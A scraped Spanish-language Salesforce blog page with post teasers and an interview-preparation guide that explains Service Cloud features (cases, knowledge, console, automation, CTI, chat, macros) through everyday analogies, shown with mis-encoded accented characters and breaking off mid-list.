Skip to content

Etiqueta: Funciones de Salesforce

Salesforce Data Cloud: Explore el papel de CDP en la excelencia del marketing, de los datos a la estrategia

Desbloquee el poder transformador de las plataformas de datos de clientes en nuestra gu铆a & descubra sus ventajas para la gesti贸n de datos y el marketing estrat茅gico.

El post Salesforce Data Cloud: Explore CDP’s Role in Marketing Excellence, From Data to Strategy appeared first on Salesforce.

Descubra las ventajas de Salesforce Data Cloud para la gesti贸n de datos y el marketing estrat茅gico

Seguir leyendo

驴Se ahoga en tickets de clientes? Nade hacia el 茅xito con una potente herramienta de gesti贸n de incidencias: Salesforce Service Cloud

Explora los retos a los que se enfrentan las empresas para ofrecer un servicio de atenci贸n al cliente eficiente y descubre la soluci贸n que cambia las reglas del juego: una potente herramienta de emisi贸n de tickets.

驴Se est谩 ahogando en tickets de clientes? Swim to Success with a Powerful Ticketing Tool: Salesforce Service Cloud appeared first on Salesforce.

Los clientes se ahogan en los tickets de los clientes?

Seguir leyendo

Gu铆a completa de documentaci贸n de Salesforce (en un mundo de inteligencia artificial)

La plataforma Salesforce es muy potente. Con cada nueva versi贸n, su org se vuelve m谩s potente, pero tambi茅n m谩s compleja. Como le dijeron una vez a Spiderman: 芦un gran poder conlleva una gran responsabilidad禄. Entonces, 驴c贸mo puede asumir la responsabilidad real de mantener su organizaci贸n? Con todo lo dem谩s que tiene que hacer, documentar sus cambios es probablemente bajo en […]

El post Gu铆a completa para la documentaci贸n de Salesforce (en un mundo de IA) appeared first on Salesforce Ben.

Seguir leyendo

Salesforce Inspector Reloaded

Salesforce Inspector es una extensi贸n de navegador (隆una gran noticia tanto para usuarios de Chrome como de Firefox!) que le permite interactuar f谩cilmente con los datos y navegar a las secciones de configuraci贸n de una forma m谩s eficaz que la navegaci贸n est谩ndar. Se trata de una soluci贸n esencial para ahorrar tiempo a todos los profesionales que trabajan con Salesforce. Este post entrar谩 en los detalles […]

El post Salesforce Inspector Reloaded appeared first on Salesforce Ben.

Seguir leyendo

馃殌 Gu铆a definitiva de 150 preguntas sobre Salesforce Service Cloud: 隆domine cada detalle! 馃専

Servicio_nube

Temas cubiertos en la entrevista de Salesforce Service Cloud:

  • Conocimientos generales y caracter铆sticas
  • Gesti贸n de casos
  • Soluciones y base de conocimientos
  • Consola de servicio
  • Portales/comunidades de clientes y agentes
  • Flujo de trabajo y automatizaci贸n:
  • Informes y paneles en Service Cloud
  • Integraci贸n de CTI y telefon铆a
  • Servicio al cliente en redes sociales
  • Chat y mensajer铆a
  • Integraci贸n de correo electr贸nico
  • M茅tricas y an谩lisis de rendimiento
  • Inteligencia artificial (IA) en la nube de servicios
  • Servicio de campo
  • Macros
  • Preguntas basadas en escenarios

Conocimientos generales y caracter铆sticas

1. 驴Qu茅 es Salesforce Service Cloud?

鈥 Imagine que dirige una empresa y tiene toneladas de clientes que hacen preguntas o tal vez tienen problemas con su producto. Ahora, desea ayudarlos de manera r谩pida y eficiente. 隆Ah铆 es donde entra Salesforce Service Cloud!

2. 驴C贸mo beneficia Service Cloud a un departamento de atenci贸n al cliente?

ni帽o, ni帽o, juego, malabarismo, pelota, vector, aislado, 18804576, arte vectorial, en, Vecteezy

Como empresa, usted maneja cosas agitadas que pueden ponerse cuando los clientes lo llaman, le env铆an correos electr贸nicos o le hacen ping en las redes sociales. 隆Es como hacer malabares! Service Cloud es como un asistente s煤per inteligente que ayuda a atrapar esas pelotas. Realiza un seguimiento de todos los problemas de los clientes (llamados "casos" en Salesforce), se asegura de que los vea la persona adecuada y proporciona respuestas que su equipo puede utilizar para responder m谩s r谩pido.

驴La mejor parte? Puede conectarse con sus clientes dondequiera que est茅n: por tel茅fono, en las redes sociales, lo que sea. 隆Menos caos, m谩s choca esos cinco en la oficina!

3. 驴Cu谩l es la diferencia entre Salesforce Sales Cloud y Service Cloud?

Paseo en coche (#1) - Openclipart

Piense en su negocio como en un autom贸vil. Sales Cloud es como el motor que lo impulsa hacia adelante: lo ayuda a encontrar nuevos clientes y los convence para que se sumen. Estamos hablando de gestionar contratos, realizar un seguimiento de las ventas y realizar previsiones. Ahora bien, 驴la nube de servicios? Ese es su sistema de direcci贸n y comodidad. Una vez que los clientes est谩n a bordo, se garantiza que est茅n contentos durante el viaje. Atiende sus preguntas, resuelve cualquier problema y se asegura de que disfruten tanto del viaje que querr谩n viajar contigo nuevamente.

4. 驴Qu茅 es OmniCanal en el contexto de Service Cloud y c贸mo beneficia a una empresa?

OmniCanal es una forma para que su empresa hable con los clientes dondequiera que prefieran: redes sociales, correo electr贸nico, tel茅fono o incluso chat en vivo. Pero es inteligente; garantiza que su equipo no se sienta abrumado y que las preguntas de sus clientes lleguen a la persona adecuada que pueda responderlas mejor.

5. 驴C贸mo mejora Service Cloud la satisfacci贸n del cliente?

Conocer bien a sus clientes y satisfacer sus necesidades r谩pidamente no s贸lo los deja satisfechos; 隆Puede convertirlos en fan谩ticos de tu marca! Adem谩s, los clientes satisfechos a menudo significan que volver谩n y les dir谩n a sus amigos lo fant谩stico que eres: 隆todos ganan!

Gesti贸n de casos

1.驴Qu茅 es un caso en Salesforce?

鈥 Imag铆nese esto: un cliente tiene una pregunta o tiene problemas con su producto. Piden ayuda. 驴Ese mensaje de ayuda? En Salesforce, a eso lo llamamos "caso".

2.驴C贸mo se pueden crear casos en Salesforce?

Los casos son como boletos. En Salesforce, los casos pueden surgir de todas partes: un cliente env铆a un correo electr贸nico, completa un formulario en su sitio web, le env铆a un mensaje en las redes sociales o incluso llama. Cada una de estas acciones puede iniciar un caso para que su El equipo sabe que alguien necesita una mano.

3. 驴Qu茅 es Web-to-Case y c贸mo se utiliza?

驴Sabes c贸mo puedes pedir tu caf茅 con anticipaci贸n en una aplicaci贸n y te estar谩 esperando cuando llegues? Web-to-Case es algo as铆, pero para servicio al cliente. Permite a sus clientes completar un formulario en su sitio web cada vez que necesitan ayuda, y esa informaci贸n se env铆a directamente a Salesforce como un caso. De esta manera, su equipo de servicio al cliente puede comenzar a desarrollar soluciones de inmediato.

4. 驴Explicar el correo electr贸nico para enviar casos?

Piense en Email-to-Case como un puente entre su bandeja de entrada de correo electr贸nico de servicio al cliente y Salesforce . Cuando sus clientes le env铆an un correo electr贸nico pidi茅ndole ayuda, Email-to-Case lo detecta y lo convierte en un caso en Salesforce.

5. 驴Qu茅 es la escalada de casos y c贸mo se configura?

Una captura de pantalla de una computadora Descripci贸n generada autom谩ticamente

A veces, las cosas necesitan un poco m谩s de urgencia, como una entrega de pizza en 30 minutos o menos. La escalada de casos ocurre cuando un caso no se ha resuelto en un cierto per铆odo de tiempo y sube en la lista de prioridades o incluso se entrega a un gerente. En Salesforce, esto se configura creando reglas de escalamiento que controlan el tiempo de los casos y activan una se帽al de alerta cuando uno est谩 tardando demasiado.

6. 驴C贸mo funcionan las reglas de asignaci贸n de casos?

Se帽ales manuales de emergencia de la polic铆a de tr谩nsito para conductores: conduzca en Malasia

Las reglas de asignaci贸n son como los polic铆as de tr谩nsito de Salesforce. Observan los nuevos casos que llegan y les indican la direcci贸n correcta. Seg煤n los detalles del caso, como de qu茅 se trata o de qui茅n proviene, estas reglas los env铆an al departamento correcto o a la persona m谩s adecuada para ayudar. Mantiene las cosas en movimiento sin problemas.

7. 驴Qu茅 son las colas de casos y en qu茅 se diferencian de las reglas de asignaci贸n?

Las reglas de asignaci贸n dirigen los casos a personas espec铆ficas de inmediato, mientras que las colas les permiten esperar en un lugar relevante para que los tome cualquier miembro disponible del equipo.

8. 驴C贸mo se realiza un seguimiento del historial del caso?

Realizar un seguimiento del historial de un caso en Salesforce es como tener un mapa de d贸nde ha estado, a qui茅n ha visitado y qu茅 se ha hecho hasta el momento. Cada vez que alguien ve el caso, realiza un cambio o agrega algo, Salesforce toma nota de ello. As铆, cualquiera que observe el caso podr谩 ponerse al d铆a con su recorrido.

9. 驴Qu茅 son los equipos de casos?

Los equipos de casos en Salesforce son como grupos de proyectos en la escuela. Puede formar un equipo de varios usuarios con diferentes roles para colaborar y resolver un caso de manera eficiente.

10. 驴C贸mo se utilizan los feeds de casos?

Los feeds de casos son como l铆neas de tiempo de las redes sociales para cada caso. Muestran una vista cronol贸gica de todas las actividades, como mensajes, cambios de estado o acciones del usuario, relacionadas con un caso.

11. 驴Puedes realizar un seguimiento del tiempo dedicado a cada caso?

S铆, con funciones de seguimiento del tiempo. Es como un cron贸metro del trabajo: puede medir cu谩nto tiempo dedican los agentes a cada caso.

12. 驴C贸mo maneja Salesforce los correos electr贸nicos masivos en la gesti贸n de casos?

Salesforce le permite enviar correos electr贸nicos masivos para mantener actualizados a muchos clientes a la vez.

13. 驴Qu茅 son los hitos del caso?

Los hitos son como puntos de control en una carrera. Son objetivos espec铆ficos que los agentes deben alcanzar dentro de un plazo determinado mientras resuelven un caso.

14. 驴Cu谩l es la diferencia entre un caso y una orden de trabajo?

Un caso es un registro de un problema de un cliente, mientras que una orden de trabajo es una solicitud de trabajo, a menudo utilizada para servicios de campo o tareas f铆sicas.

15. 驴Cu谩les son los beneficios de utilizar Chatter para los casos?

Chatter es como una sala de chat para el trabajo. Los agentes pueden discutir casos, compartir archivos y obtener comentarios de los miembros del equipo directamente en el registro del caso.

16. 驴Cu谩les son los componentes de la regla de asignaci贸n de casos en Salesforce?

En Salesforce, la regla de asignaci贸n de casos giraba en torno a dos componentes principales, como la regla de caso y los criterios de caso.

Regla de caso: una regla de caso define una o m谩s de una condici贸n que debe cumplirse para ser asignada a un usuario espec铆fico. Podemos agregar tantas entradas de reglas como queramos a una sola regla de asignaci贸n.

Criterios de caso: Los criterios de caso son las condiciones que se basan en diferentes factores como el origen del caso, el estado, el tipo, etc.

Soluciones y base de conocimientos

1. 驴Qu茅 es el conocimiento de Salesforce?

Salesforce Knowledge es como una carpeta para toda la informaci贸n que su equipo necesita para ayudar a los clientes. Es un lugar donde puedes almacenar art铆culos, preguntas frecuentes, gu铆as de soluci贸n de problemas y m谩s, todo organizado y f谩cil de encontrar.

2. Explicar el proceso de creaci贸n y mantenimiento de una Base de Conocimiento en Salesforce.

Crear una base de conocimientos es como abastecer una biblioteca. Empiece por escribir art铆culos; pueden ser preguntas frecuentes, gu铆as pr谩cticas o pasos para la soluci贸n de problemas. Una vez que haya terminado, los colocar谩 en los estantes (es decir, los publicar谩 en Salesforce Knowledge) y as铆, estar谩n disponibles para que los lea su equipo o incluso sus clientes. Deber谩 revisar sus art铆culos con regularidad, actualizar la informaci贸n anterior y seguir agregando material nuevo para mantener todo actualizado.

3. 驴Cu谩l es la diferencia entre Soluciones y Art铆culos de Conocimiento?

Libro. Antiguo libro de texto, enciclopedia, diccionario o libro de cuentos de hadas. Dise帽o de dibujos animados felices para ni帽os, p谩gina para colorear, estampado de camisetas, icono, logotipo, etiqueta, parche, pegatina. SVG, cliparts, vectores y ilustraciones libres de derechos.

Las soluciones son como esas viejas enciclopedias : tienen informaci贸n 煤til, pero son un poco b谩sicas y solo su equipo puede leerlas. Por otro lado, los art铆culos de conocimiento son como tener una base de datos completa en l铆nea. Son m谩s din谩micos, pueden incluir videos e im谩genes y puedes compartirlos no solo con tu equipo sino tambi茅n con tus clientes.

4. 驴C贸mo pueden los usuarios de Service Cloud aprovechar los art铆culos de conocimiento?

Piense en los usuarios de Service Cloud como bibliotecarios. Cuando un cliente tiene una pregunta, en lugar de hojear montones de libros o luchar para encontrar un experto, puede buscar el art铆culo de conocimiento correcto y tener las respuestas al alcance de su mano. Esto hace que ayudar a los clientes sea m谩s r谩pido, m谩s preciso y, sinceramente, mucho menos estresante.

5. 驴Pueden los clientes acceder a los art铆culos de conocimiento? 驴Si es as铆, c贸mo?

隆Por supuesto que pueden! Puede configurar una comunidad de clientes o un sitio web p煤blico donde estos art铆culos est茅n disponibles. Los clientes pueden ingresar, buscar lo que necesitan y, a menudo, resolver sus propios problemas sin tener que levantar el tel茅fono o enviar un correo electr贸nico.

Consola de servicio

1.驴Qu茅 es la Consola de Servicio en Salesforce?

Ilustraci贸n de Chef y m谩s Vectores Libres de Derechos de Adulto - Chef, Dibujos Animados, Gorro De Chef - iStock

Imag铆nese ser chef en una cocina ocupada y bien equipada. La Consola de servicio es como su estaci贸n de cocina, donde tiene sus ingredientes (datos del cliente), utensilios (herramientas y aplicaciones) y recetas (art铆culos de conocimiento), todo en un solo lugar. Est谩s all铆, cocinando varios platos (manejando varios casos de clientes) a la vez. 馃嵆馃懇鈥嶐煃仇煍

2. 驴C贸mo mejora la Consola de servicio la productividad de los agentes?

Si eres chef en una cocina, 驴no ser铆a m谩s f谩cil cocinar si todos tus ingredientes, utensilios y recetas estuvieran en un solo lugar? Eso es lo que hace la Consola de servicio por los agentes. Pone todo lo que necesitan en un solo lugar. Pueden chatear con los clientes, echar un vistazo al historial de su cuenta y comprobar sus pedidos, todo al mismo tiempo. 隆Es como tener superpoderes, para que puedan ayudar a los clientes m谩s r谩pido y mejor!

3. 驴Se puede personalizar la Consola de servicio? Si es as铆, 驴c贸mo?

隆Por supuesto! Al igual que puedes reorganizar las aplicaciones en tu tel茅fono, puedes modificar la Consola de servicio para adaptarla a tus necesidades. Todo esto se hace a trav茅s de algo llamado "Creador de aplicaciones", donde arrastra y suelta los componentes que desea. Es como jugar un juego en el que dise帽as tu centro de mando.

Portales/comunidades de clientes y agentes:

1. 驴Qu茅 es una comunidad de clientes en el contexto de Service Cloud?

Dibujo infantil de CCC, bloques de colores 鈥 Catskill Community Center

Imag铆nese un centro comunitario en un vecindario. Es un lugar donde los residentes se re煤nen para discutir temas, compartir noticias, pedir prestado herramientas o incluso organizar eventos. Ahora, imagine si su empresa tuviera un 鈥渃entro comunitario鈥 virtual para sus clientes. Esa es una comunidad de clientes en Salesforce. Es un espacio en l铆nea donde sus clientes pueden reunirse para hacer preguntas, compartir ideas e incluso resolver problemas juntos. Tambi茅n pueden encontrar art铆culos o anuncios 煤tiles que haya publicado, 隆muy parecido a un tablero de anuncios comunitario!

2. 驴En qu茅 se diferencian los portales de agentes de los portales/comunidades de clientes?

Cree un portal de socios, habilite la cuenta de socio y los usuarios y agregue

En el centro comunitario, piense en el Portal del Cliente/Comunidad como el sal贸n principal donde todos se re煤nen, conversan y comparten. El Portal del Agente, sin embargo, es como la oficina administrativa que da al sal贸n principal. Desde esta oficina, sus agentes de servicio al cliente pueden observar lo que sucede en la comunidad, intervenir para ayudar cuando sea necesario o proporcionar recursos.

3. 驴C贸mo pueden los clientes utilizar las comunidades para autoservicio?

En una comunidad de clientes, los clientes pueden explorar los art铆culos que usted ha proporcionado, encontrar respuestas a preguntas comunes o hacer una nueva pregunta que cualquier miembro de la comunidad puede responder. Esto les permite encontrar soluciones en su propio tiempo y t茅rminos, sin necesidad de llamar directamente a la 鈥渙ficina del administrador鈥 (contactar con soporte).

4. 驴Cu谩les son las mejores pr谩cticas para crear una comunidad de clientes?

La comunidad de clientes de Salesforce debe ser f谩cil de usar y proporcionar valor real. Aseg煤rese de que sea de f谩cil acceso, con categor铆as claras para la discusi贸n y una amplia base de conocimientos. Actualice y modere peri贸dicamente el contenido para garantizar que sea relevante y apropiado. Fomente la participaci贸n reconociendo a los miembros activos u organizando eventos o desaf铆os comunitarios.

Flujo de trabajo y automatizaci贸n

1. 驴Se puede automatizar el enrutamiento de casos? 驴Si es as铆, c贸mo?

En Service Cloud, los casos se pueden enrutar autom谩ticamente. Puede establecer criterios, como si un caso proviene de un cliente VIP, va directamente a su mejor agente, o si es un problema com煤n, va a cualquier agente disponible. De esta manera, todos reciben un servicio eficiente y eficaz.

2. 驴C贸mo se automatiza el seguimiento del acuerdo de nivel de servicio (SLA) en Service Cloud?

驴Est谩s preparado para Domino's... - Domino's Pizza Bangladesh | Facebook

Imag铆nese el restaurante prometiendo que cada pedido se servir谩 en 30 minutos o, de lo contrario, ser谩 gratis. Para cumplir esta promesa, tienen un sistema que inicia una cuenta regresiva en el momento en que se realiza un pedido y alerta al gerente si llega a los 25 minutos. Service Cloud puede realizar un seguimiento de los SLA de forma similar. Puede establecer los plazos en los que los casos deben resolverse seg煤n su nivel de prioridad y automatizar recordatorios, escalamientos u otras acciones si esos plazos se acercan o no se cumplen. 隆Mantiene al equipo responsable y a los clientes contentos!

3. 驴Podr铆a definir la Gesti贸n de derechos en el contexto de Salesforce Service Cloud?

La gesti贸n de derechos en Salesforce Service Cloud es una funci贸n que ayuda a las empresas a definir, hacer cumplir y realizar un seguimiento de los acuerdos de nivel de servicio (SLA) con sus clientes. Permite a las empresas establecer el nivel de soporte al que tiene derecho un cliente, en funci贸n de factores como garant铆as de productos, contratos de servicio o planes de soporte. Esta caracter铆stica garantiza que los clientes reciban el soporte al que tienen derecho dentro del plazo acordado.

4. 驴Puedes explicar la funcionalidad de Visual SLA Timelines?

Los cronogramas visuales de SLA en Salesforce Service Cloud ofrecen una representaci贸n gr谩fica de los cronogramas asociados con cada SLA. Ayudan a los agentes de servicio a visualizar el tiempo restante necesario para resolver un caso seg煤n el SLA asociado. Esto permite a los agentes priorizar su trabajo de manera efectiva y garantizar el cumplimiento de los t茅rminos del SLA.

Informes y paneles

1. 驴C贸mo mejoran los informes y paneles las operaciones de servicio?

Imag铆nese que al final de cada d铆a, el gerente recibe un resumen de todo lo sucedido: cu谩ntos clientes llegaron, cu谩l fue el plato m谩s popular, cu谩ntos elogios o quejas se recibieron, etc. En Service Cloud, los informes y paneles son como este resumen diario. Ofrecen a los directivos una visi贸n r谩pida pero completa de c贸mo van las cosas. 驴Los clientes esperan demasiado? 驴Algunos problemas se resuelven m谩s r谩pido que otros? Esta informaci贸n ayuda al equipo a saber qu茅 funciona y qu茅 no, para que puedan mejorar su "servicio".

2. 驴Se puede realizar un seguimiento del rendimiento de los agentes con Service Cloud? Si es as铆, 驴c贸mo?

Service Cloud le permite realizar un seguimiento del desempe帽o de sus agentes. Puede ver cu谩ntos casos han resuelto, qu茅 tan r谩pido est谩n trabajando e incluso c贸mo los clientes califican su servicio. Es como un gr谩fico de desempe帽o para los camareros, pero para sus agentes de servicio.

3. 驴Cu谩les son algunas m茅tricas de servicio comunes que puede rastrear en Service Cloud?

En el mundo de Service Cloud, las m茅tricas comunes incluyen cosas como

  • tiempo promedio de resoluci贸n de casos
  • puntuaciones de satisfacci贸n del cliente
  • tasas de resoluci贸n del primer contacto
  • vol煤menes de casos por tipo o fuente

Integraci贸n de CTI y telefon铆a

1. 驴Qu茅 es la Integraci贸n Telef贸nica Computadora (CTI)?

Representante De Servicio Al Cliente De Dibujos Animados De Forma Tridimensional De Persona De Negocios - Banco de fotos e im谩genes de stock - iStock

Es un t茅rmino para un sistema que permite que las computadoras interact煤en con los tel茅fonos. Significa que cuando alguien llama, el sistema de atenci贸n al cliente sabe inmediatamente qui茅n es y cu谩l es su historial con la empresa.

2.驴C贸mo mejora CTI el servicio al cliente?

En el restaurante sin CTI, cada llamada de un cliente ser铆a como una reuni贸n de camareros durante la cena por primera vez. Tendr铆an que volver a hacer todas las preguntas b谩sicas: "驴Tiene alguna alergia?" 鈥溌縋refieres asiento junto a la ventana o en el pasillo?鈥 etc茅tera. Con CTI, es como si el camarero ya te conociera. Te saludan por tu nombre, recuerdan que eres al茅rgico al man铆, saben que te gusta el queso extra y tienen lista tu mesa favorita. En t茅rminos de atenci贸n al cliente, esto ahorra tiempo, personaliza la experiencia del cliente.

3. 驴Puede darnos un ejemplo de c贸mo se utiliza CTI en un escenario de call center?

Cuando un cliente llama, la pantalla del agente muestra inmediatamente el nombre del cliente, su historial de compras, problemas anteriores y cualquier otra informaci贸n relevante. Luego, el agente puede saludar al cliente por su nombre y atender sus necesidades de manera proactiva, a veces incluso antes de que el cliente indique por qu茅 llama. Se trata de hacer que la experiencia de servicio sea fluida y placentera, como tener la mejor mesa lista incluso antes de entrar.

Servicio al cliente en redes sociales

1. 驴Qu茅 es el servicio al cliente social en Salesforce?

驴Sabes c贸mo puedes chatear con amigos y ver qu茅 est谩n haciendo en las redes sociales? Salesforce permite a las empresas hacer lo mismo con sus clientes. Pueden revolotear y ver lo que la gente dice sobre ellos en las redes sociales.

2. 驴C贸mo pueden los agentes utilizar Salesforce para responder a las consultas de los clientes en las redes sociales?

Ya sea que los clientes tuiteen, publiquen en Facebook o compartan historias de Instagram sobre sus experiencias o problemas, los agentes no tienen que desplazarse de una plataforma a otra. Pueden responder a todas estas publicaciones sociales desde su 'colmena' de Salesforce, asegur谩ndose de que nadie se sienta ignorado y que cada problema se resuelva r谩pidamente.

3. 驴Puedes realizar un seguimiento de las conversaciones de las redes sociales en Service Cloud?

隆Absolutamente! Service Cloud controla todas las conversaciones que ocurren entre la empresa y los clientes en las plataformas sociales. Recuerda qui茅n dijo qu茅, almacena informaci贸n sobre los problemas del cliente e incluso c贸mo se resolvi贸. De esta manera, si el cliente vuelve a comunicarse, la empresa no hace las mismas preguntas de siempre, sino que contin煤a la conversaci贸n justo donde la dej贸, como si retrocediera en el historial de chat con un amigo.

Chat y mensajer铆a

1. 驴C贸mo funciona Live Agent en Service Cloud?

Imag铆nese si estuviera comprando en una gran tienda y en lugar de tener que buscar ayuda por todo el lugar, apareciera un asistente personal a su lado en el momento en que parec铆a confundido. As铆 es Live Agent en el mundo online. Es una caracter铆stica de Service Cloud que permite a los agentes de servicio al cliente chatear en tiempo real con los clientes mientras est谩n en el sitio web para responder preguntas, dar consejos o ayudarlos a encontrar lo que necesitan.

2. 驴Cu谩les son los beneficios de utilizar el chat para atenci贸n al cliente?

Los clientes obtienen atenci贸n instant谩nea y sus preguntas pueden responderse de inmediato. Adem谩s, es muy conveniente porque pueden hacer otras cosas mientras conversan. Para las empresas, significa que pueden manejar varios chats a la vez, lo que es como poder ayudar a varios clientes al mismo tiempo en diferentes l铆neas de pago.

3. 驴Se pueden automatizar las respuestas en Live Agent?

S铆, si alguien dice "hola", el sistema puede decir autom谩ticamente "隆Hola!". 驴C贸mo puedo ayudarte hoy?" Est谩 programado para reconocer palabras o preguntas espec铆ficas y luego proporcionar una respuesta preestablecida. Esto significa que el agente no tiene que escribir las mismas respuestas una y otra vez y los clientes obtienen respuestas ultrarr谩pidas a preguntas comunes.

4. 驴C贸mo maneja Salesforce los mensajes SMS para el servicio de atenci贸n al cliente?

Salesforce aporta esa comodidad al servicio al cliente. Con las funciones de mensajer铆a SMS, las empresas pueden enviar mensajes de texto a los clientes y los clientes pueden responder. Pueden enviar recordatorios de citas, confirmaciones, actualizaciones r谩pidas o incluso responder preguntas, todo a trav茅s de mensajes de texto. Todo se rastrea y almacena en Salesforce, para que la empresa no pierda la conversaci贸n.

Integraci贸n de correo electr贸nico

1. 驴C贸mo se utiliza el correo electr贸nico en Service Cloud?

No se trata s贸lo de enviar y recibir correos electr贸nicos; es un sistema completo que gestiona las comunicaciones por correo electr贸nico con los clientes. Puede mantener un historial de todas las interacciones, para saber exactamente qu茅 se dijo y cu谩ndo.

2. 驴Puedes automatizar las respuestas por correo electr贸nico?

– 隆Absolutamente! Seg煤n ciertas palabras clave en el correo electr贸nico del cliente o criterios espec铆ficos, el sistema puede enviar una respuesta escrita previamente. Es instant谩neo, por lo que los clientes no tienen que esperar y les da a los agentes reales m谩s tiempo para manejar los problemas complejos que necesitan un toque humano.

3. 驴C贸mo se asegura de que los correos electr贸nicos de los clientes se env铆en a los agentes adecuados?

Utilice el enrutamiento de correo electr贸nico en Service Cloud. Usando las reglas que usted configura, los correos electr贸nicos se pueden dirigir a ciertos agentes seg煤n el contenido del correo electr贸nico, la informaci贸n del cliente o incluso la carga de trabajo de cada agente.

Soporte M贸vil

1. 驴C贸mo respalda Salesforce el servicio al cliente m贸vil?

Con la aplicaci贸n m贸vil Salesforce, todo lo que puede hacer en su escritorio, ahora puede hacerlo en su tel茅fono: verificar los detalles del cliente, actualizar casos o incluso chatear con los clientes.

2. 驴Cu谩les son las limitaciones del servicio al cliente m贸vil en Salesforce?

Dibujos animados y c贸mics de Parking Boot - im谩genes divertidas de CartoonStock

Si bien la aplicaci贸n m贸vil Salesforce es s煤per poderosa, es un poco como intentar colocar una nave espacial en un lugar de estacionamiento. Algunas tareas o informes complejos pueden resultar dif铆ciles de navegar en una pantalla m谩s peque帽a y es posible que ciertas personalizaciones no se muestren como lo hacen en un escritorio.

M茅tricas y an谩lisis de rendimiento

1. 驴C贸mo se mide la satisfacci贸n del cliente en Service Cloud?

En Service Cloud, no solo responde las consultas de los clientes y espera que est茅n satisfechos; lo verifica utilizando herramientas como encuestas, puntajes CSAT y Net Promoter Scores (NPS). Puede enviarlos autom谩ticamente despu茅s de que se resuelva un caso. Es como preguntar: "驴Qu茅 le pareci贸 nuestro servicio?" 隆para que puedas seguir viviendo esa experiencia de servicio cinco estrellas!

2. 驴Qu茅 es una puntuaci贸n de satisfacci贸n del cliente (CSAT)?

CSAT es como preguntarle a sus clientes, en una escala del 1 al 5. Es una puntuaci贸n que los clientes otorgan en funci贸n de su satisfacci贸n con una interacci贸n espec铆fica que tuvieron con su equipo de servicio. Cuanto mayor sea la puntuaci贸n, mejor trabajo hizo para cumplir (隆o superar!) sus expectativas.

3. 驴Qu茅 es Net Promoter Score (NPS) y c贸mo se utiliza en Salesforce?

NPS es como preguntar a sus comensales: "驴Recomendar铆a nuestro restaurante a otras personas?" y luego, dependiendo de su respuesta, se agrupan en Promotores, Pasivos o Detractores. No se trata s贸lo de un plato de sopa; 隆Lo importante es si toda la experiencia gastron贸mica les hace querer cont谩rselo a sus amigos! En Salesforce, puede enviar encuestas NPS y luego realizar un seguimiento de su puntuaci贸n a lo largo del tiempo, con el objetivo siempre de mejorar la experiencia del curso completo.

4. 驴Se pueden integrar herramientas de encuestas externas con Salesforce?

Puede integrarlo con herramientas de encuestas externas que quiz谩s ya est茅 utilizando o prefiera, como SurveyMonkey o Google Forms. De esta manera, re煤ne todos esos comentarios cruciales en un solo lugar, lo que facilita ver el panorama general y tomar decisiones informadas.

Inteligencia artificial (IA)

1. 驴Qu茅 es Salesforce Einstein y c贸mo se aplica a Service Cloud?

Salesforce Einstein utiliza IA para analizar las diferentes interacciones y datos, predecir las necesidades de los clientes e incluso automatizar las respuestas.

2. 驴C贸mo funcionan los Bots de Einstein?

Se encargan de las tareas sencillas y rutinarias del servicio de atenci贸n al cliente, como responder preguntas comunes o guiar a un usuario a trav茅s de un proceso establecido.

3. 驴Puede Einstein sugerir respuestas a los agentes?

Es como un manual din谩mico e inteligente que no s贸lo tiene todas las respuestas sino que tambi茅n sabe exactamente cu谩ndo proporcionarlas. Analiza el problema del cliente y proporciona al agente la mejor respuesta o soluci贸n, acelerando el servicio y asegur谩ndose de que las "comidas" de su servicio al cliente sean siempre deliciosas.

Servicio de campo

1. 驴Qu茅 es Field Service Lightning?

Vector libre | Banner de cami贸n de comida de estilo de dibujos animados

Imagina que organizas un festival de camiones de comida, donde varios camiones sirven diferentes delicias por todo el lugar. Ahora, Field Service Lightning (FSL) es como tener un coordinador de eventos s煤per organizado que sabe qu茅 cami贸n de comida est谩 d贸nde, qu茅 sirven, qui茅n est谩 disponible para servir delicias y qui茅n se toma un descanso. 隆Se trata de administrar su equipo sobre la marcha, asegur谩ndose de que tengan los "ingredientes" correctos (herramientas, piezas) para resolver cualquier desaf铆o "culinario" (problema del cliente) que encuentren en el campo!

2.驴C贸mo se integra Field Service Lightning con Service Cloud?

Field Service Lightning, cuando se integra con Service Cloud, brinda informaci贸n en tiempo real hacia y desde las unidades m贸viles (FSL), para que todos sepan lo que sucede a su alrededor.

3. 驴Puede programar y enviar agentes de servicio de campo utilizando Salesforce?

隆Absolutamente! Puede planificar horarios, asignar agentes a diferentes trabajos y asegurarse de que est茅n listos para mejorar sus especialidades seg煤n sea necesario. Y si hay una prisa repentina, el sistema puede redirigir a los agentes desde lugares menos concurridos para que ayuden, equilibrando la carga de trabajo y manteniendo contentos a los clientes.

Claro, profundicemos en las macros en Service Cloud de Salesforce con un enfoque conversacional f谩cil de recordar. 隆Imag铆nate que estamos charlando en tu cafeter铆a favorita!

macros

1.驴Qu茅 es una macro en Salesforce Service Cloud?

Es un atajo genial que realiza tareas repetitivas por ti. Entonces, si te encuentras haciendo los mismos clics una y otra vez, una macro dice: "隆Oye, ya tengo esto!". 隆Y listo!

2. 驴Todos pueden usar mis Macros?

Si los mantiene p煤blicos, cualquiera puede usarlos. Pero si cree que su macro es secreta, puede guard谩rsela para usted. En Salesforce, se trata de establecer permisos y compartir configuraciones.

3. 驴Pueden las macros interactuar con aplicaciones de terceros en Salesforce?

鈥 Directamente, no. Las macros est谩n dise帽adas para automatizar las funcionalidades est谩ndar de Salesforce.

4. 驴Es posible deshacer las acciones de una Macro una vez ejecutada?

No, no hay un bot贸n "deshacer" para las macros. Una vez que se ejecuta una macro, sus acciones se consideran definitivas.

5. 驴Se pueden programar las macros para que se ejecuten a una hora espec铆fica?

No, las macros no se pueden programar. Son como un conjunto de herramientas manuales que requieren que alguien las utilice activamente; no funcionan con un temporizador autom谩tico.

6. 驴Qu茅 tipo de acciones no puedes realizar con una Macro?

Las macros no pueden manejar procesos complejos de toma de decisiones, interactuar con sistemas externos ni crear registros.

7. 驴C贸mo se organizan y gestionan las Macros para un equipo de agentes en Service Cloud?

Utilice carpetas para organizar y compartir colecciones de macros.

8. 驴Se puede modificar una macro activa? 驴Hay que tomar alguna precauci贸n?

S铆, puede editar una macro y probar las modificaciones antes de su uso generalizado.

9. 驴Es posible asignar Macros espec铆ficas a usuarios o perfiles espec铆ficos?

Si bien no puede asignar una macro directamente a usuarios espec铆ficos, puede controlar el acceso utilizando las carpetas de macros y la configuraci贸n de uso compartido de Salesforce.

10. 驴C贸mo se relacionan las macros con la API de Salesforce?

Las macros no interact煤an directamente con la API de Salesforce. Funcionan dentro de la interfaz de usuario, automatizando las acciones manuales del usuario.

11. 驴Se pueden utilizar las macros junto con Salesforce Flows?

